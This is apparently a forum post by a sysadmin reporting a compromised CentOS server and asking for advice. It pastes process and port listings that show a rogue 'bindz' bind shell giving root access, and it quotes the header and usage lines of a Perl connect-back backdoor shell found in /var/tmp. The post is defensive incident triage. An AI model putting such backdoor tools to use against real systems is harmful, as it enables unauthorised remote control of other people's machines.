So pretty sure one of my boxes has been owned. Just wanted some advise on what to do next. Obviously, i'll need to nuke the fecker and start over but it would be really nice to find out how they got in as its a CentOS 4.3 which is bang up to date. So i found: PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME CPU COMMAND 7052 apache 25 0 27320 5348 8 R 99.0 0.5 736:52 0 uselib24 [root at box tmp]# netstat -lnp |more Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:32768 0.0.0.0:* LISTEN 3012/rpc.statd tcp 0 0 127.0.0.1:32769 0.0.0.0:* LISTEN 3138/xinetd tcp 0 0 0.0.0.0:66 0.0.0.0:* LISTEN 3124/sshd tcp 0 0 0.0.0.0:9865 0.0.0.0:* LISTEN 7031/bindz tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 14534/mysqld tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 2993/portmap tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 7031/bindz tcp 0 0 0.0.0.0:113 0.0.0.0:* LISTEN 3138/xinetd tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 3578/vsftpd tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN 10707/sendmail: acc tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN 7031/bindz Bindz.... hmm. telnetting to the port gave me a root shell - nice. My firewall scripts should block that port but i don't know if they're working now :( contents of /var/tmp was: -rwxrwxr-x 1 apache apache 19429 Jan 10 16:20 bindz -rw-r--r-- 1 apache apache 2100 Jan 8 21:32 dc.txt -rwxrwxr-x 1 apache apache 479843 Aug 3 2005 uselib24 dc.txt started: #!/usr/bin/perl use IO::Socket; #IRAN HACKERS SABOTAGE Connect Back Shell #code by:LorD #We Are :LorD-C0d3r-NT #Email:LorD at ihsteam.com # #lord at SlackwareLinux:/home/programing$ perl dc.pl #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- # #Usage: dc.pl [Host] [Port] # #Ex: dc.pl 127.0.0.1 2121 #lord at SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 #--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- # #[*] Resolving HostName #[*] Connecting... 127.0.0.1 #[*] Spawning Shell #[*] Connected to remote host i might e-mail him and thank him. So what next?